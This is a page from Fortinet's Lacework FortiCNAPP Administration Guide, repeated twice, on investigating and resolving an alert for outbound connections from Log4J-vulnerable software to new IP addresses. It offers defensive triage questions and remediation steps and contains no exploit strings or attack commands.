Fortinet black logo

Administration Guide

Home Lacework FortiCNAPP Administration Guide

Outbound Connection From Vulnerable Application to an IP Address

Outbound Connection From Vulnerable Application to an IP Address

This alert occurs when Lacework FortiCNAPP detects a software application with the critical Java Log4J vulnerability has made an outbound connection to an external IP address that it has not contacted in the last 90 days. Though the IP address may have been contacted by other parts of your deployment, this vulnerable software has not made contact with it until now.

This vulnerability, which allows remote code execution, has its own alert type. The software can be a container image running on a cluster or a software binary on a host, with detected vulnerable Log4J Java class files.

Why this alert is important

Log4J class files have been detected in this software, and it is displaying the key indicator of the vulnerability being exploited. This vulnerability enables attackers to gain remote code execution, granting them complete control over the affected host or container.

The Log4J exploit involves sending a specifically crafted string to a vulnerable application, triggering an outbound call to an external domain or IP address. Therefore, this alert potentially indicates exploitation activity targeting this application.

Why this might be just fine

Though this activity could potentially indicate exploit activity, it's important to acknowledge that there are legitimate reasons for an application to connect to a new IP address, such as changes in application or configuration.

Under certain circumstances, the risk of running Log4J-vulnerable software can be contained. For example, it can be isolated within a sandbox environment by utilizing tools like gVisor; or have strong network egress controls implemented by the DevOps team in collaboration with the security team. These security measures, which restrict DNS requests and network connections, can mitigate the risk.

However, it's crucial to prioritize patching or removing the Log4J-vulnerable software as a more reliable approach, as security controls may have gaps or be inadvertently disabled.

Investigation

This alert requires thorough and careful investigation, as new external connections serve as a strong indicator of Log4J (CVE-2021-44228) vulnerability exploitation.

When investigating this alert, consider the following questions:

  1. What triggered the connection? Why did it occur?
  2. Which process initiated the connection?
  3. Is the process a known and legitimate one, or is it benign?
  4. Is the connection a regular behavior of the mentioned process?
  5. What is the origin of the IP address involved in the connection?
  6. Has this IP address been associated with malicious behavior or flagged by our threat resources?
  7. Are other machines within our network establishing connections to this IP address?
  8. Were there any notable events or activities on the machine or resource just before or after the connection? Create a timeline of events to gain a comprehensive understanding.

When examining the Alert Details in the Lacework FortiCNAPP Console, direct your attention to the following critical areas:

  1. Determine the IP address involved by reviewing the Alert Description.
  2. Identify the origin of the connection, including the specific machine, user, and process involved.
  3. Examine the number of bytes exchanged and the direction of the data transfer by reviewing the Where section.
  4. To access information about the process, click the process or container name in the Alert Description. This will provide details about the process, including its runtime duration, prevalence on other machines, safety considerations, and any known threat information associated with it.
  5. To assess the frequency of connections initiated by the process, refer to the Alert Description. For instance, you can examine if a process such as /bin/foo has initiated 24 connections to 12 distinct IP addresses in the previous 14 days. This information will help you gauge the level of activity associated with the process.
  6. Gather information about the IP address, including details such as Whois registration, historical Whois records, reverse DNS information, and historical rDNS data. Determine if the IP address is flagged as known malicious by any sources or if there are any indications of malicious activity associated with it.
  7. Identify other machines on your network connected to the same IP address by clicking the IP address in the alert. This information helps to understand the scope of the connection activity.

Resolution

Follow these steps to resolve the alert:

  1. Apply patches or updates to address the vulnerability. This may require downtime or disruption to the application, so you should plan accordingly.
  2. Implement additional security controls or hardening measures to prevent future attacks, such as configuring firewalls or intrusion detection systems to block certain types of traffic.
  3. Monitor the system for further suspicious activity, such as additional connections or attempts to exploit the vulnerability.
  4. Conduct regular security assessments to identify vulnerabilities and ensure security controls work effectively.
Previous
Next

Outbound Connection From Vulnerable Application to an IP Address

Outbound Connection From Vulnerable Application to an IP Address

This alert occurs when Lacework FortiCNAPP detects a software application with the critical Java Log4J vulnerability has made an outbound connection to an external IP address that it has not contacted in the last 90 days. Though the IP address may have been contacted by other parts of your deployment, this vulnerable software has not made contact with it until now.

This vulnerability, which allows remote code execution, has its own alert type. The software can be a container image running on a cluster or a software binary on a host, with detected vulnerable Log4J Java class files.

Why this alert is important

Log4J class files have been detected in this software, and it is displaying the key indicator of the vulnerability being exploited. This vulnerability enables attackers to gain remote code execution, granting them complete control over the affected host or container.

The Log4J exploit involves sending a specifically crafted string to a vulnerable application, triggering an outbound call to an external domain or IP address. Therefore, this alert potentially indicates exploitation activity targeting this application.

Why this might be just fine

Though this activity could potentially indicate exploit activity, it's important to acknowledge that there are legitimate reasons for an application to connect to a new IP address, such as changes in application or configuration.

Under certain circumstances, the risk of running Log4J-vulnerable software can be contained. For example, it can be isolated within a sandbox environment by utilizing tools like gVisor; or have strong network egress controls implemented by the DevOps team in collaboration with the security team. These security measures, which restrict DNS requests and network connections, can mitigate the risk.

However, it's crucial to prioritize patching or removing the Log4J-vulnerable software as a more reliable approach, as security controls may have gaps or be inadvertently disabled.

Investigation

This alert requires thorough and careful investigation, as new external connections serve as a strong indicator of Log4J (CVE-2021-44228) vulnerability exploitation.

When investigating this alert, consider the following questions:

  1. What triggered the connection? Why did it occur?
  2. Which process initiated the connection?
  3. Is the process a known and legitimate one, or is it benign?
  4. Is the connection a regular behavior of the mentioned process?
  5. What is the origin of the IP address involved in the connection?
  6. Has this IP address been associated with malicious behavior or flagged by our threat resources?
  7. Are other machines within our network establishing connections to this IP address?
  8. Were there any notable events or activities on the machine or resource just before or after the connection? Create a timeline of events to gain a comprehensive understanding.

When examining the Alert Details in the Lacework FortiCNAPP Console, direct your attention to the following critical areas:

  1. Determine the IP address involved by reviewing the Alert Description.
  2. Identify the origin of the connection, including the specific machine, user, and process involved.
  3. Examine the number of bytes exchanged and the direction of the data transfer by reviewing the Where section.
  4. To access information about the process, click the process or container name in the Alert Description. This will provide details about the process, including its runtime duration, prevalence on other machines, safety considerations, and any known threat information associated with it.
  5. To assess the frequency of connections initiated by the process, refer to the Alert Description. For instance, you can examine if a process such as /bin/foo has initiated 24 connections to 12 distinct IP addresses in the previous 14 days. This information will help you gauge the level of activity associated with the process.
  6. Gather information about the IP address, including details such as Whois registration, historical Whois records, reverse DNS information, and historical rDNS data. Determine if the IP address is flagged as known malicious by any sources or if there are any indications of malicious activity associated with it.
  7. Identify other machines on your network connected to the same IP address by clicking the IP address in the alert. This information helps to understand the scope of the connection activity.

Resolution

Follow these steps to resolve the alert:

  1. Apply patches or updates to address the vulnerability. This may require downtime or disruption to the application, so you should plan accordingly.
  2. Implement additional security controls or hardening measures to prevent future attacks, such as configuring firewalls or intrusion detection systems to block certain types of traffic.
  3. Monitor the system for further suspicious activity, such as additional connections or attempts to exploit the vulnerability.
  4. Conduct regular security assessments to identify vulnerabilities and ensure security controls work effectively.
Previous
Next